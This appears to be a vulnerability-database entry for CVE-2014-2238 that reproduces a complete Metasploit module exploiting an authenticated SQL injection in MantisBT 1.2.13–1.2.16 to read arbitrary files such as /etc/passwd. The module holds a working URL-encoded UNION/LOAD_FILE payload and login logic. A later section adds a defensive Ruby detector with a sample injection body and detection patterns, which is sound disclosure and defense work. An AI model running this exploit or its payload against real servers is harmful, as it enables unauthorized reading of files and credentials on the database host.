MantisBT Admin SQL Injection Arbitrary File Read

Published: 03 Mar 2014 20:36:38. Reported by Jakub Galczyk, Brandon Perry. Type: metasploit. Source: www.rapid7.com

MantisBT Admin SQL Injection Arbitrary File Read. MantisBT versions 1.2.13 through 1.2.16 are vulnerable to a SQL injection attack in the administrative configuration report page; an attacker who holds administrator credentials can use it to read arbitrary files from the database host. The vulnerability was fixed in 1.2.17.

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MantisBT Admin SQL Injection Arbitrary File Read",
      'Description'    => %q{
      Versions 1.2.13 through 1.2.16 are vulnerable to a SQL injection attack if
      an attacker can gain access to administrative credentials.

      This vuln was fixed in 1.2.17.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jakub Galczyk', #initial discovery
          'Brandon Perry <bperry.volatile[at]gmail.com>' #meatpistol module
        ],
      'References'     =>
        [
          ['CVE', '2014-2238'],
          ['URL', 'https://www.mantisbt.org/bugs/view.php?id=17055']
        ],
      'Platform'       => ['win', 'linux'],
      'Privileged'     => false,
      'DisclosureDate' => '2014-02-28'))

    register_options(
      [
        OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd']),
        OptString.new('USERNAME', [ true, 'Single username', 'administrator']),
        OptString.new('PASSWORD', [ true, 'Single password', 'root']),
        OptString.new('TARGETURI', [ true, 'Relative URI of MantisBT installation', '/'])
      ])

  end

  def run
    post = {
      'return' => 'index.php',
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD'],
      'secure_session' => 'on'
    }

    resp = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/login.php'),
      'method' => 'POST',
      'vars_post' => post
    })

    unless resp && resp.body
      fail_with(Failure::UnexpectedReply, "Error in server response. Ensure the server IP is correct.")
    end

    cookie = resp.get_cookies

    if cookie == ''
      fail_with(Failure::NoAccess, "Authentication failed")
    end

    filepath = datastore['FILEPATH'].unpack("H*")[0]

    payload = "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-7856%27"
    payload << "+UNION+ALL+SELECT+11%2C11%2C11%2C11%2CCONCAT%280x71676a7571%2CIFNULL%28CAST%28HEX%28LOAD_FILE"
    payload << "%280x#{filepath}%29%29+AS+CHAR%29%2C0x20%29%2C0x7169727071%29%2C11%23&apply_filter_button=Apply+Filter"

    resp = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/adm_config_report.php'),
      'method' => 'POST',
      'data' => payload,
      'cookie' => cookie,
    })

    unless resp && resp.body
      fail_with(Failure::UnexpectedReply, "Error in server response")
    end

    # qgjuq is prepended to the result of the SQL injection
    # qirpq is appended to the result of the SQL injection
    # This allows the use of a simple regex to grab the hex-encoded
    # contents of the file easily from the page source.
    match = /qgjuq(.*)qirpq/.match(resp.body)

    # Bail out cleanly instead of raising NoMethodError on nil when the
    # markers are absent (patched target, wrong URI, or no access).
    if match.nil?
      fail_with(Failure::NotVulnerable, "Result markers not found in response; target may be patched or not vulnerable")
    end

    # Capture group 1 is the HEX(LOAD_FILE(...)) output; decode it back to bytes.
    file = [match[1]].pack("H*")

    path = store_loot("mantisbt.file", "text/plain", datastore['RHOST'], file, datastore['FILEPATH'])

    if path and path != ''
      print_good("File saved to: #{path}")
    end
  end
end
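The module above injects into the filter_config_id parameter of adm_config_report.php, wraps the hex-encoded LOAD_FILE result between the markers qgjuq and qirpq, and decodes it with a regex. The following detector is an added example (not part of the Metasploit module or of MantisBT) that a defender could run over logged POST bodies from a proxy or WAF: it rejects non-integer filter_config_id values, decodes the 0x hex literals so the requested path and markers become readable, and flags UNION/LOAD_FILE usage. The sample bodies are constructed for the example.

```ruby
require 'cgi'

# Constructed sample request bodies as a proxy or WAF might log them for
# POST /adm_config_report.php. Body 1 is a benign filter; body 2 mirrors
# the injection pattern used by the module above.
SAMPLE_BODIES = [
  "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=12&apply_filter_button=Apply+Filter",
  "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-7856%27+UNION+ALL+SELECT+11%2C11%2C11%2C11%2C" \
  "CONCAT%280x71676a7571%2CIFNULL%28CAST%28HEX%28LOAD_FILE%280x2f6574632f706173737764%29%29+AS+CHAR%29%2C0x20%29%2C" \
  "0x7169727071%29%2C11%23&apply_filter_button=Apply+Filter"
].freeze

# SQL keywords that never belong in a numeric config-id filter.
SQLI_PATTERN = /\bUNION\b|\bSELECT\b|LOAD_FILE|CONCAT\s*\(/i

# Turn MySQL 0x... hex literals back into the strings they encode, so an
# analyst sees the requested file path and the result markers in clear text.
def decode_hex_literals(sql)
  sql.gsub(/0x([0-9a-f]+)/i) { [Regexp.last_match(1)].pack('H*') }
end

# Inspect one URL-encoded body. Returns a finding hash, or nil when the
# parameter is absent or is a plain integer (legitimate use).
def inspect_body(body)
  params = CGI.parse(body)            # also decodes '+' and %XX escapes
  value = params['filter_config_id'].first
  return nil if value.nil?
  return nil if value.match?(/\A-?\d+\z/)

  decoded = decode_hex_literals(value)
  {
    value: value,
    decoded: decoded,
    sqli: decoded.match?(SQLI_PATTERN),
    file_read: decoded.match?(/LOAD_FILE\s*\(/i),
    # Path handed to LOAD_FILE, if any, after hex decoding.
    load_file_arg: decoded[/LOAD_FILE\s*\(\s*'?([^)']+)/i, 1]
  }
end

# Scan a batch of bodies and keep only the suspicious ones.
def scan(bodies)
  bodies.filter_map { |b| inspect_body(b) }
end

scan(SAMPLE_BODIES).each { |f| puts "SQLi=#{f[:sqli]} file_read=#{f[:file_read]} path=#{f[:load_file_arg]}" }
```

Because the vulnerable page only accepts a numeric id, the integer check alone is a low-false-positive rule; the keyword and hex decoding add the evidence an analyst needs to see what file was targeted.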

Last updated: 16 Feb 2022 23:22
Vulners AI Score: 0.8 (Low risk)
CVSS 2: 6.5
EPSS: 0.11311